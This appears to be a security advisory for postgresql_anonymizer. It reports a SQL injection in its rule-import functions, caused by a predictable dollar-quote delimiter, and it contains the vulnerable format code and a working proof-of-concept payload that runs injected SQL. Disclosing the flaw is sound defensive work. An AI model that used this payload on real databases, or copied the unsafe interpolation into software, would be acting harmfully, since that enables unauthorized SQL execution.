Affected: postgresql_anonymizer 3.2.0-dev current checkout Tested on: PostgreSQL 18.4, Docker runtime built from current source Functions: - anon.import_roles_rules(jsonb, text) - anon.import_database_rules(jsonb, text) Rule import builds SECURITY LABEL statements by interpolating untrusted label strings into a dollar- quoted SQL literal. In release builds the delimiter is stable: $label_test$. ``` format!( "SECURITY LABEL FOR {} ON {} {} IS $label_{}$ {} $label_{}$;", profile, kind.to_string().to_uppercase(), name, random, label, random, ) ``` Because label is inserted raw, an imported rule can close the dollar quote and append arbitrary SQL: ``` CREATE ROLE mdi_runtime_role; SELECT anon.import_roles_rules( jsonb_build_object( 'mdi_runtime_role', 'MASKED $label_test$; CREATE TABLE public.mdi_runtime_sqli_marker(proof int); INSERT INTO public.mdi_runtime_sqli_marker VALUES (1337); --' ), 'anon' ); ``` SELECT proof FROM public.mdi_runtime_sqli_marker; -- returns: 1337 Impact Arbitrary SQL executed as the caller of anon.import_roles_rules() or anon.import_database_rules(). Runtime testing showed these functions are SECURITY INVOKER, so this is not an automatic low- privilege to superuser escalation: injected CREATE ROLE ... SUPERUSER fails for an unprivileged caller. However, this becomes privileged SQL execution if attacker-controlled JSON is imported by a superuser, extension owner, migration job, admin automation, or any other privileged session. Reporter: Mehmet Ince @mdisec